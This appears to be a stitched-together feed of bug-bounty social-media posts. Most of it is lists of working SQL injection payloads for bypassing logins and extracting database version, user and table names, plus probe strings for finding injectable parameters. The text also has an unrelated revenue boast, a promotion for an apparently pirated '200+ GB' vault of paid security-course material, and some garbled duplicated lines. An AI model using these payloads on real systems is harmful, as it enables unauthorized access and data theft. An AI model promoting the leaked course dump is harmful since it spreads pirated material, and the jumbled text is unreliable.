MY FIRST X VIDEO MADE OVER $250,000! 😲
But it’s a bit of a facade. Advertisers saw the attention it was getting and bought ads on my video (I think) and thus my revenue per view is prob higher than what you’d experience
SQL Injection - Bypass Auth Payloads
#bugbountytips #bugbountytip
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
Auth bypass Via SQL Injection Payloads #bugbountytips #bugbountytips
' or 'a'='a
' or a=a--
' or a=a--
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one--
' or uid like '%
' or uname like '%
' or userid like '%
payloads by Auth Bypass
' OORR 1<2 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
#bugbountytips #bugbountytip
Here are some tips that are used to easily find SQL injection 70%
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
Thanks #bugbountytips
Auth Bypass via SQL
') or ('a'='a and hi") or ("a"="a
' UNION ALL SELECT 1, @version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
#bugbountytip
Alhamdulillah, I was awarded $2750 from HackerOne
Vulnerable: Account Takeover
Tips: always check everything and function, check login history and update passwd or reused #bugbounty
Bug : rate limit otp bypass
SQLi To Auth bypass
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1- information_Schema.tables;# admin'
and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7
#bugbountytip #bugbountytips
🧠💣 381 FILES. 200+ GB. ELITE ONLY.
I just unlocked a vault that would make even top bug bounty hunters drop everything:
🔥 OSCP
🔥 OSEP
🔥 OSWE
🔥 THM / HTB
🔥 EC-Council
🔥 Cisco CyberOps
🔥 Linux Priv Esc
🔥 PEN-300 Full Video Series
🔥 BloodHound, AD, SSH, API, SQL, 🔥
IDOR on user profile update
IDOR via email enumeration
IDOR on subscription APIs
Broken object-level authorization in API
Reflected XSS in search bar
Stored XSS in comments
DOM-based XSS in JS-heavy pages
Open redirect via query param
Open redirect with base64 trick